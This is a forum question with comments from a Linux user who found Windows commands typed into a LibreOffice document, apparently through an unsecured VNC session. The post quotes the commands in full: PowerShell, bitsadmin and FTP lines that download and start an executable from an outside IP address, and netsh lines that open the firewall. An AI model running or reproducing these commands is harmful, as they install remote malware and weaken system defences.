0

I was AFK for a few hours. This is what I saw in my LibreOffice document when I returned to my laptop:

cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe'
rcmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/cawk.exe %temp%\4950606004.exe&start %temp%\4950606004.exe
rcmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe “ok” ENABLE&netsh advfirewall firewall add rule name=”ok” dir=in action=allow program=”C:\Windows\System32\ftp.exe” enable=yes
rcmd.exe /c “cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get cawk.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start cawk.exe”

I am on Linux Mint, so the commands (Windows; PowerShell?) were obviously not targeted individually against my system but rather came from a random attack. Still, I wonder how this could happen. I was connected to the VPN network of my university during that time (using Cisco AnyConnect). I also had VNC running with a rather mediocre password. This is my only guess. Do you have any ideas? Should I be worried that my system is infected?

flxapps
  • 109
  • If you are seeing your computer run commands that download random files via FTP and run them, and it's not in the correct shell language of the computer, then yes, your machine has been breached or the document you had open had a malicious macro. – schroeder Sep 23 '19 at 19:53
  • 2
    It's also possible that a malicious network program guessed your VNC password and just blindly tried to connect and run those commands. If win+r doesn't do anything then it may have just typed it out to your document instead. – user Sep 23 '19 at 19:56

0 Answers0